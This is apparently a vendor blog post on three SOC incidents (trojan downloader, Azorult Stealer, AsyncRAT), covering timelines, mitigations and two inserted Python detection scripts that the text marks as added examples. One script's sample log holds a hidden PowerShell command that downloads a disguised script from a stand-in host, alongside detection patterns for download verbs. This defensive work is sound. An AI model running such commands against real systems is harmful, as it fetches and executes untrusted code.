Between August 21-28, 2024, Blackpoint’s Security Operations Center (SOC) responded to 438 total incidents and partner saves across our monitored on-premises, Microsoft 365, and Google Workspace environments, with confirmed or likely threat actor use of:
- Trojan malware likely for persistence and deploying second-stage payloads;
- Azorult Stealer for information theft; and
- AsyncRAT for persistence and information theft.
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.
Trojan Malware Incident with Industrials Partner on August 21, 2024
Topline Takeaways
- Industry target: Industrials
- Attacker information:
  - Trojan malware
  - Scheduled tasks “oYv4Cerxh” and “RS2IKHNXO”
  - .zip initial file
- Antivirus (AV) and / or EDR present in environment? No
- Threat assessment for partners:
  - The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use Trojan malware to exploit other Industrials organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Dedicated software center
  - Least-privilege access controls
  - Regularly audit both environment and endpoints
  - Scripting language controls
Trojan Malware Incident Timeline for 2024-08-21
- Blackpoint’s MDR+R technology flagged suspicious PowerShell and possible JavaScript persistence on a host of an Industrials end partner.
  - All of the flagged JavaScript files originated from C:\ProgramData, a directory threat actors often use to hide files because it is hidden by default in File Explorer.
- Initial investigation by the Active SOC team found that the source of the infection was a .zip file downloaded by a user.
  - The .zip file allegedly related to banking activity, but contained a .lnk file that called a PowerShell script which enumerated .NET types on the affected machine.
  - The PowerShell command searched for types whose names matched the wildcard pattern *siU*s. If no pattern was identified, the type was assigned to the variable $c.
  - The environment variable for paths was set to 7z26T1LZ5ZF6.
- Additional analysis discovered that, after initial setup, the malicious script reached out to a compromised WordPress site and downloaded and executed multiple files in memory.
  - The activity resulted in multiple JavaScript files being dropped in C:\ProgramData, with associated scheduled tasks, oYv4Cerxh and RS2IKHNXO, created for persistence.
  - PowerShell was also seen calling out to a Linux command and control (C2) machine hosted in France.
- Active SOC analysts isolated the affected machine and deleted the malicious scheduled tasks before reaching out to the Industrials partner to provide additional information and remediation advice concerning the incident.
- Post-incident investigation by the Active SOC team and Adversary Pursuit Group (APG) determined:
  - One of the JavaScript files created a scheduled task to execute a second JavaScript file.
  - The second JavaScript file established persistence by copying itself into the %programdata% directory under a name derived from the machine’s GUID.
  - It then attempted to download and execute two scripts from remote URLs using PowerShell.
  - Additionally, the malicious payload appeared to be a trojan that is likely capable of:
    - Conducting reconnaissance on the machine;
    - Capturing keystrokes; and
    - Collecting data from the system (1).
More About Trojan Malware
Trojan malware is a type of malware that uses deception and social engineering to trick victims into running purportedly benign programs that hide the attacker’s malicious intentions (2). Trojans can be packed into downloads for games, tools, applications, software updates, and document attachments. In this incident, the .zip and .lnk files were detected as trojan downloaders (3 & 4).
Downloader trojan malware is typically used to gain access to a victim’s system and then download and execute additional malware or tools on the system (2).
These types of malware variants are often attractive tools for threat actors because they can be packaged to look like many legitimate downloads and can use the latest trends, events, and the victim’s pure curiosity to lure victims into downloading the malware.
APG Threat Analysis of Trojan malware for 2024
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will likely continue to use Trojan malware over the next 12 months.
We base this assessment on internal Blackpoint observed attacks, such as this August 2023 analysis of a downloader trojan identified as “Trojan.Fruity.1” (5) and this July 17, 2024 incident involving a Financials end partner (6).
The APG’s assessment is augmented by external reports from other research teams. For example:
- In April 2024, security researchers with eSentire reported an incident that involved the deployment of a trojan, Koi Loader (7).
  - The victim reportedly received a phishing email with a .zip attachment related to potential banking activity. The .zip file included a .lnk file that downloaded the second-stage payload to the victim.
- In August 2024, security researchers with ReasonLabs reported a widespread extension trojan campaign that installed rogue Google Chrome and Microsoft Edge extensions via a trojan distributed through fake websites impersonating popular software (8).
  - The malicious installers registered a scheduled task configured to execute a PowerShell script responsible for downloading and executing the next-stage payload.
Recommended Trojan Malware Mitigations and Remediations
Blackpoint’s APG recommends the following remediations and mitigations of threat actor use of Trojan malware in your environment.
- Provide a dedicated software center to guarantee employees can easily access the applications and updates required for their jobs from a safe and monitored location, so they don’t “go rogue” and accidentally download malware from a malvertising or SEO-poisoned instance.
  - Trojan malware variants are often delivered via social engineering attacks. While this is frequently through phishing emails, they have also been observed being deployed via malicious websites impersonating commonly used software and services. This mitigation helps ensure that employees are protected from downloading impersonated software and inadvertently installing a trojan.
- Employ least-privilege access controls to ensure that users only have access to the data and resources required to complete their job functions, making it harder for threat actors to move laterally within the infected environment to more desirable targets.
  - In the event a threat actor successfully deploys a trojan, limiting a user account’s permissions adds an extra layer of protection, as threat actors would be unable to create scheduled tasks, access sensitive environments, or run malicious scripts with a basic user account.
- Regularly audit both environment and endpoints for what “normal” user activity looks like, any old and unused credentials or authorizations, and possible “shadow IT” that was previously unaccounted for. Such audits should also ensure the application and enforcement of all technical and administrative controls throughout your organization.
  - In this incident, the first JavaScript file created scheduled tasks for persistence and to download and execute a second JavaScript file. Auditing the environment and endpoints can help identify unexpected scheduled tasks and prevent them from providing persistence for threat actors and malware.
- Minimize the use of scripting languages – or implement strict controls on their use – as threat actors rely on scripting languages to deploy malware and conduct malicious activities.
  - This incident included the use of JavaScript and PowerShell to conduct malicious activities. Minimizing the use of scripting languages, limiting the users who are able to run them, and implementing strict controls on their use can help prevent multiple JavaScript files from being run and PowerShell from being used to download and execute payloads from remote URLs.
Azorult Stealer Incident with Technology Partner on August 23, 2024
Topline Takeaways
- Industry target: Technology
- Attacker information:
  - Likely Azorult Stealer
  - Compromised WordPress site
  - .zip initial access file
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
  - The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use Azorult Stealer to exploit other Technology organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Employee security training
  - Heuristics-based activity monitoring and remediation
  - Password managers
  - Multifactor authentication (MFA)
Likely Azorult Stealer Incident Timeline for 2024-08-23
- Blackpoint’s MDR+R technology flagged suspicious PowerShell and JavaScript persistence on a host of a Technology partner.
- Initial investigation by the Active SOC found the source of the infection to be a .zip file; the execution of the file resulted in PowerShell callouts to a compromised WordPress site.
- Additional analysis discovered the PowerShell command tied to the malware persistence first downloaded a .php file hosted on the compromised site and saved it as a .js file.
- Additionally, a string was downloaded from the WordPress site, which was then utilized to create a scheduled task “PxiuaHgmZ” to execute the .js file every minute.
- The .js file called back out to the compromised WordPress domain to download and execute a PowerShell loader that downloaded and executed a binary, determined to likely be the Azorult Stealer.
- Active SOC analysts isolated the affected devices and contacted the Technology partner to relay incident details and mitigation advice.
More About Azorult Stealer
Azorult Stealer (AKA PuffStealer, Ruzalto) is an information stealer that has been active since at least 2016 and has been sold across Russian-language cybercriminal forums (9). The first observed variant of Azorult Stealer was written in the Delphi programming language and was reportedly ported to C++ in 2019 (10).
Threat actors likely find Azorult Stealer an attractive option due to the purported ease of use and the malware’s ability to steal cryptocurrency wallet information, system information, credentials, and more (10).
Purchasing malware that is created and maintained by a developer and sold on cybercriminal forums allows lower-skilled threat actors to deploy malware and steal sensitive information. Azorult malware is likely used by multiple threat groups, which makes post-incident attribution more difficult.
APG Threat Analysis of Azorult Stealer for 2024
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will likely continue to use Azorult Stealer over the next 12 months.
This assessment is augmented by external reports from other research teams. For example:
- In January 2024, security researchers with Cyble reported an Azorult Stealer campaign that utilized a .zip file that contained a malicious shortcut file posing as a PDF document (11).
  - The shortcut file included an obfuscated PowerShell script and commands to drop and execute a batch file using the Task Scheduler.
  - The final step of the reported incident triggered another PowerShell script leading to the execution of the Azorult malware.
- In March 2024, security researchers with Netskope Threat Labs reported an Azorult Stealer campaign that leveraged fake Google Sites pages and HTML smuggling to distribute the malware (12).
  - When a victim was tricked into opening the rogue web page from a phishing email, the browser decoded the script and extracted the payload on the host device, allowing the threat actor to bypass typical security controls.
Recommended Azorult Stealer Mitigations and Remediations
Blackpoint’s APG recommends the following remediations and mitigations for the threat actor use of Azorult Stealer in your environment.
- Run employee security training as a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
  - Azorult Stealer has been frequently delivered via malicious websites and phishing emails. Exposing employees to the frequently observed social engineering tactics can aid in providing employees with the awareness and knowledge to identify social engineering tactics and report incidents to an incident response authority.
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
  - Threat actors have been observed frequently making use of scheduled tasks for persistence; in this case, the scheduled task was set to run once every minute. This type of detection can help identify anomalous scheduled tasks and files stored in uncommon folders.
- Require the use of secure password managers, disabling plaintext password storage and local password caching to make accessing passwords by threat actors from compromised accounts more difficult.
  - Azorult Stealer has the ability to target and exfiltrate credentials from infected hosts. Requiring the use of strong and unique passwords in combination with a secure password manager can aid in making it more difficult for threat actors to steal credentials to sensitive information and systems.
- Enforce multi-factor authentication (MFA) on all user accounts – especially those with privileged access! – to help decrease the chances of undetected credential compromise.
  - Requiring the use of MFA, in combination with strong and unique passwords, makes it more difficult for threat actors to access compromised accounts. If threat actors gain access to credentials, enabling MFA can help provide an additional layer of authentication to protect accounts.
Likely AsyncRAT Incident with Financials Partner on August 26, 2024
Topline Takeaways
- Industry target: Financials
- Attacker information:
  - Likely AsyncRAT
  - .wsf initial access file
  - ScreenConnect
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
  - The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use AsyncRAT to exploit other Financials organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Employee security training
  - Scripting language controls
  - Heuristics-based activity monitoring and remediation
  - Password managers
AsyncRAT Incident Timeline for 2024-08-26
- Blackpoint’s MDR+R technology alerted to the execution of multiple suspicious Visual Basic, batch, and PowerShell scripts on a workstation of a Financials partner.
- The Blackpoint Active SOC’s investigation ultimately identified the malware on the affected device as likely AsyncRAT.
- Initial investigation by the Active SOC identified that the initial access file was a .wsf file executed using wscript.exe via ScreenConnect.
  - The execution of the .wsf file spawned a child PowerShell process to download, deobfuscate, and execute the second-stage payload.
  - The PowerShell script downloaded a .jpg file – which was not an image but an obfuscated PowerShell script.
  - The obfuscated script then replaced certain bytes in the .jpg file to execute yet another malicious PowerShell script.
  - Once executed, the malicious script would download the next-stage payloads to disk.
- Additional analysis by the Active SOC team discovered a scheduled task, “Windows DuckDown Reflection taskFolder true wazer”, likely created to gain persistence on the affected device using a .vbs file.
  - The VBScript called a batch script that called another PowerShell script.
  - That PowerShell script performed process injection into the native Windows process RegSvcs.exe, where the final payload was delivered.
- Active SOC analysts isolated the workstation due to the malware infection and contacted the Financials partner to provide information about the incident.
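The execution chain in this timeline (remote-support tool launching wscript.exe on a .wsf, wscript.exe spawning PowerShell, PowerShell fetching a “.jpg” that is really a script, and RegSvcs.exe used as the injection host) is made up of parent/child links that show up in ordinary process-creation telemetry. The following detection sketch is an added example, not Blackpoint’s or the SOC’s code; the log format, the ScreenConnect process names, the URL and the file paths are all constructed for illustration.

```python
"""Flag the AsyncRAT execution chain described in the timeline above in a
process-creation log: remote-support client -> wscript.exe running a .wsf ->
powershell.exe fetching an image-named URL -> RegSvcs.exe as injection host.
Added example, not Blackpoint's code. The log format, image names and URLs
are constructed for illustration."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name only, lower-cased
    cmdline: str


# Assumed process names of the remote-support client (not taken from the page).
REMOTE_SUPPORT = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
INJECTION_HOSTS = {"regsvcs.exe"}
IMAGE_URL = re.compile(r"https?://\S+\.(?:jpg|jpeg|png|gif)\b", re.I)
DOWNLOAD_VERB = re.compile(r"invoke-webrequest|downloadstring|downloadfile|\biwr\b|\bcurl\b|\bwget\b", re.I)


def parse_log(text):
    """Parse constructed 'pid|ppid|image path|command line' records."""
    events = []
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(int(pid), int(ppid), image.rsplit("\\", 1)[-1].lower(), cmdline))
    return events


def detect_chain(events):
    """Return one finding per suspicious parent/child link or command line."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = parent.image if parent else ""
        if e.image in SCRIPT_HOSTS and pimg in REMOTE_SUPPORT and ".wsf" in e.cmdline.lower():
            findings.append(f"pid {e.pid}: {pimg} launched {e.image} on a .wsf file")
        if e.image in POWERSHELL and pimg in SCRIPT_HOSTS:
            findings.append(f"pid {e.pid}: {pimg} spawned {e.image}")
        if e.image in POWERSHELL and IMAGE_URL.search(e.cmdline) and DOWNLOAD_VERB.search(e.cmdline):
            findings.append(f"pid {e.pid}: PowerShell downloads an image-named URL (likely a disguised script)")
        if e.image in INJECTION_HOSTS and pimg in POWERSHELL:
            findings.append(f"pid {e.pid}: {pimg} spawned {e.image}, a common injection host")
    return findings


# Constructed sample log modelled on the incident; the last two rows are benign noise.
SAMPLE_LOG = r"""
100|1|C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe|ScreenConnect.ClientService.exe
200|100|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\Public\Documents\statement.wsf
300|200|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c Invoke-WebRequest http://example.invalid/img/photo.jpg -OutFile C:\Users\Public\p.txt
400|300|C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe|RegSvcs.exe
500|1|C:\Windows\explorer.exe|explorer.exe
600|500|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\Scripts\inventory.ps1
"""

if __name__ == "__main__":
    for finding in detect_chain(parse_log(SAMPLE_LOG)):
        print(finding)
```

Each link is scored on its own, so a single anomalous parent (for example explorer.exe running an inventory script) produces nothing, while the full chain produces one finding per hop.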
More About AsyncRAT
AsyncRAT is an open-source remote access tool that was released via GitHub and has been adopted by several threat groups. The malware is capable of multiple actions (13), including the ability to:
- Capture keystrokes on a victim’s machine;
- Examine running processes to determine if a debugger is present on the targeted device;
- Create scheduled tasks that maintain persistence on affected devices; and
- Record screen content on the affected devices.
Due to the availability of AsyncRAT, it is very likely deployed by threat actors of all skill levels, including APT groups (14) and ransomware operations (15).
AsyncRAT is likely to remain an attractive tool for threat groups over the next 12 months, as using publicly available and proven successful malware allows threat groups to target organizations without requiring the personal skills or resources needed to develop and maintain custom malware variants.
APG Threat Analysis of AsyncRAT for 2024
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will very likely continue to use AsyncRAT over the next 12 months.
We base this assessment on internal Blackpoint observed attacks, such as this June 13, 2024 incident targeting an Industrials partner (16).
The APG’s assessment is further augmented by external reports from other research teams. For example:
- In August 2024, security researchers with Forcepoint reported an AsyncRAT incident that delivered the malicious payload via a suspicious TryCloudflare quick tunnel and Python packages (18).
  - The researchers also identified an AsyncRAT operator using HTML email attachments for initial access, in which the Windows “search-ms” protocol and its URI protocol handler were used to deliver malicious LNK files and then Python scripts.
- Security researchers with ReliaQuest have reported that AsyncRAT remains one of the top malware variants observed in incidents (17).
  - The continued use of AsyncRAT to collect information, gain persistence, and deploy second-stage malware highlights threat actors’ determination to keep using the tool.
Recommended AsyncRAT Mitigations and Remediations
Blackpoint’s APG recommends the following remediations and mitigations of threat actor use of AsyncRAT in your environment.
- Run employee security training as a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
  - AsyncRAT was likely delivered via a .wsf file and has been identified as being delivered via phishing emails with various malicious attachments. Exposing employees to the social engineering tactics frequently observed in the wild can help them identify suspicious emails with malicious links and attachments. This type of training should include how and when to report these social engineering attacks to an incident response authority.
- Minimize the use of scripting languages – or implement strict controls on their use – as threat actors rely on scripting languages to deploy malware and conduct malicious activities.
  - AsyncRAT operators were observed utilizing batch scripts, PowerShell scripts, and Visual Basic Scripts to deploy the malware, execute commands, and read the text contents of other files. Restricting the ability to conduct this type of activity can help limit the threat actor’s ability to successfully complete an attack.
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
  - Anomalous scheduled tasks, and files stored in anomalous folders such as a music folder, can be detected with behavior-based detection methods. This type of detection can aid in identifying behaviors that indicate a potential compromise.
- Require the use of secure password managers, disabling plaintext password storage and local password caching to make accessing passwords by threat actors from compromised accounts more difficult.
  - AsyncRAT is capable of stealing credentials and logging keystrokes. Using a secure password manager can help prevent credentials from being stolen and accounts from being accessed by threat actors.
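All three incidents in this post relied on scheduled tasks for persistence: randomly named tasks running JavaScript out of C:\ProgramData in the Trojan case, a task running a .js file every minute in the Azorult case, and a task running a .vbs file in the AsyncRAT case. The audit below, an added example that is not Blackpoint’s code, checks exported Task Scheduler XML for exactly those traits; the two sample task documents are constructed, and the name heuristic is deliberately crude.

```python
"""Audit exported Task Scheduler XML for the persistence traits in the three incidents above:
script-host actions, scripts under ProgramData or other user-writable folders, very short
repetition intervals (the Azorult task ran every minute) and random-looking task names.
Added example, not Blackpoint's code; both sample task XML documents are constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"programdata|appdata|\\users\\[^\\]+\\(?:music|pictures|public)", re.I)
SCRIPT_EXT = re.compile(r"\.(?:js|vbs|wsf|ps1|bat|cmd)\b", re.I)


def iso_duration_seconds(value):
    """Convert a Task Scheduler interval such as PT1M or P1DT2H to seconds (None if unparsable)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def looks_random(name):
    """Crude heuristic for generated names: 6+ alphanumerics, mixed case or digits, few vowels."""
    leaf = name.rsplit("\\", 1)[-1]
    if not re.fullmatch(r"[A-Za-z0-9]{6,}", leaf):
        return False
    generated_shape = any(c.isdigit() for c in leaf) or (
        any(c.islower() for c in leaf) and any(c.isupper() for c in leaf))
    vowel_ratio = sum(c in "aeiouAEIOU" for c in leaf) / len(leaf)
    return generated_shape and vowel_ratio < 0.35


def audit_task(xml_text, task_name):
    """Return the findings for one exported task; an empty list means nothing stood out."""
    root = ET.fromstring(xml_text)
    findings = []
    for action in root.iterfind(".//t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = action.findtext("t:Arguments", default="", namespaces=NS).strip()
        exe = command.rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS:
            findings.append(f"action runs script host {exe}")
        if USER_WRITABLE.search(args) and SCRIPT_EXT.search(args):
            findings.append(f"script in user-writable location: {args}")
    for interval in root.iterfind(".//t:Repetition/t:Interval", NS):
        seconds = iso_duration_seconds(interval.text)
        if seconds is not None and seconds <= 300:
            findings.append(f"repeats every {seconds}s")
    if looks_random(task_name):
        findings.append(f"random-looking task name {task_name!r}")
    return findings


# Constructed sample modelled on the Azorult task: a .js under ProgramData run every minute.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1M</Interval></Repetition>
    <StartBoundary>2024-08-23T10:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Windows\System32\wscript.exe</Command>
    <Arguments>C:\ProgramData\update.js</Arguments></Exec></Actions>
</Task>"""

# Constructed benign task: a vendor updater under Program Files, once a day.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\updater.exe</Command>
    <Arguments>/check</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("PxiuaHgmZ", SUSPICIOUS_TASK), ("VendorUpdateTaskMachine", BENIGN_TASK)):
        print(name, audit_task(xml_text, name) or ["clean"])
```

On a live host the XML for each task can be exported with the Task Scheduler tooling and fed to `audit_task` with its task name; several findings on one task are a stronger signal than any single trait, since legitimate software also uses script hosts and short intervals on their own.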
References and Resources
A quick note on incident details:
As these analyses concern recent incidents in actively monitored environments, certain details may be occasionally omitted and/or obfuscated, to better secure our partners and protect any still-ongoing investigations.
However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.
Please feel free to reach out to the APG directly if you have any questions about a specific incident!
- VirusTotal’s Repository: “74b85c502651bae1734849f3ac49d8152a6c0fbb9234083b1384d8cbe3640068” by VirusTotal on 2024-08-27
- Malwarebytes’s Blog: “Trojan horse – Virus or malware?” by Malwarebytes on 2023-10-30
- VirusTotal’s Repository: “abf8b3773306184cd4ad5b6d25ce127b50c9250b51cf2d2cc86ae72c08fc648b” by VirusTotal on 2024-08-27
- VirusTotal’s Repository: “8ab2ac37791e59e9d971b216c889eaba50a1fc95ef5602efd4748499b0db7808” by VirusTotal on 2024-08-27
- Blackpoint Cyber’s Blog: “Pebbles Aren’t Alone: The Fruity Find Making Waves in Cybersecurity” by Blackpoint Cyber on 2023-08-02
- Blackpoint Cyber’s Blog: “SYS01 Stealer, Ratty RAT, and AsyncRAT” by Blackpoint Cyber on 2024-07-26
- eSentire’s Blog: “Unraveling Not AZORult but Koi Loader: A Precursor to Koi Stealer” by eSentire on 2024-04-09
- ReasonLabs’s Blog: “New Widespread Extension Trojan Malware Campaign” by ReasonLabs Research Team on 2024-08-06
- MITRE’s Repository: “Azorult” by MITRE on 2022-10-13
- BlackBerry’s Blog: “What Is AZORult Malware?” by BlackBerry on N/A
- Cyble’s Blog: “Sneaky Azorult Back in Action and Goes Undetected” by Cyble on 2024-01-12
- Netskope’s Blog: “From Delivery To Execution: An Evasive Azorult Campaign Smuggled Through Google Sites” by Jan Michael Alcantara on 2024-03-15
- MITRE’s Repository: “AsyncRAT” by MITRE on 2023-10-10
- Trend Micro’s Blog: “New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware” by Daniel Lunghi; Jaromir Horejsi on 2022-04-27
- Cyberint’s Blog: “Credentials And Control Go Bye, Bye, Bye with AsyncRAT: What You Need to Know” by Adi Bleih on 2024-05-05
- Blackpoint Cyber’s Blog: “AsyncRAT, NetSupport RAT, and VssAdmin Abuse for Shadow Copy Deletion” by Blackpoint Cyber on 2024-06-21
- ReliaQuest’s Blog: “5 Malware Variants You Should Know” by Hayden Evans on 2024-08-15
- Forcepoint’s Blog: “Tweaking AsyncRAT: Attackers Using Python and TryCloudflare to Deploy Malware” by Mayur Sewani on 2024-08-26